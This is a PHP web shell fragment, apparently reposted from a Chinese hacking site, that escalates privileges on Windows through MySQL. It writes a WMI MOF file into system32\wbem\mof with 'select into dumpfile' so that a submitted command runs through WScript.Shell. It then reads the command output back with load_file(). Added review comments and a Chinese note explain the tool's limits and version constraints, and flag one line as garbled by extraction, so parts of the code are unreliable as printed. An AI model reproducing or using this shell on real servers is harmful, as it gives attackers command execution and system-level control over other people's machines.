location.href='?action=connect'"; } if(empty($_GET["action"])){ ?>Win MOF Shell
'.mysql_error().''); echo "
"; echo ""; if (isset($_POST['cmd'])){ $strCmd=$_POST['cmd']; $cmdshell='cmd /c '.$strCmd.'>'.$path; $mofname="c:/windows/system32/wbem/mof/system.mof"; $payload = "#pragma namespace("\\\\.\\root\\subscription") instance of __EventFilter as $EventFilter { EventNamespace = "Root\\Cimv2"; Name = "filtP2"; Query = "Select * From __InstanceModificationEvent " "Where TargetInstance Isa \"Win32_LocalTime\" " "And TargetInstance.Second = 5"; QueryLanguage = "WQL"; }; instance of ActiveScriptEventConsumer as $Consumer { Name = "consPCSV2"; ScriptingEngine = "JScript"; ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"$cmdshell\")"; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };"; mysql_select_db($_COOKIE["connect"]["dbname"],$conn); $sql1="select '$payload' into dumpfile '$mofname';"; if(mysql_query($sql1)) echo "Execute Successful!
Please click the read button to check the result!!
If the result is not correct,try read again later
"; else die(mysql_error()); mysql_close($conn); } if(isset($_POST['flag'])) { $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"]) or die('
'.mysql_error().'
');
// Read-back branch ($_POST['flag']): fetch the redirected command output with
// MySQL's load_file() from $path, the file the earlier `cmd /c <cmd> > $path`
// redirect wrote. $path is assigned outside this fragment.
// Per MySQL semantics load_file() needs the FILE privilege on the connecting
// account and is subject to secure_file_priv; when either blocks it the
// function returns NULL rather than raising an error, so an empty result here
// does not by itself mean the command never ran.
// NOTE(review): the nested quotes in load_file("".$path."") are not valid PHP
// as printed — this line is almost certainly mangled by page extraction.
$sql2="select load_file("".$path."");";
// mysql_query() returns false on failure; that return value is never checked,
// so a failed query only surfaces as warnings from the two calls below.
$result2=mysql_query($sql2);
// $num is computed but not used anywhere in this branch.
$num=mysql_num_rows($result2);
// Print column 0 of every row straight into the page. There is no
// htmlspecialchars() call, so the file contents (i.e. raw command output)
// are emitted unescaped.
while ($row = mysql_fetch_array($result2, MYSQL_NUM)) {
echo "
";
echo '
'. $row[0].'
';
}
// $conn was opened on the preceding line of the same branch. Note that the
// whole ext/mysql (mysql_*) API used here was removed in PHP 7.0.
mysql_close($conn);
}
}
?>
早就写好了,发给群里几个小兄弟,不知道怎么就到helen大黑客手里了,大黑客helen还原封不动地保留了哥哥的内网 IP 啊 感谢龙哥帮助哈。（审校注：这种 MOF 提权依赖 MySQL 账号拥有 FILE 权限、secure_file_priv 未作限制，且 MySQL 服务以足够权限写入 system32\wbem\mof；只有 Windows XP/2003 的 WMI 会自动编译该目录下的 .mof 文件，Vista/2008 及之后的系统不再如此。代码使用的 mysql_* 扩展在 PHP 7.0 中已被移除。）
文章来源于lcx.cc:mof提权带回显带清楚命令版本.php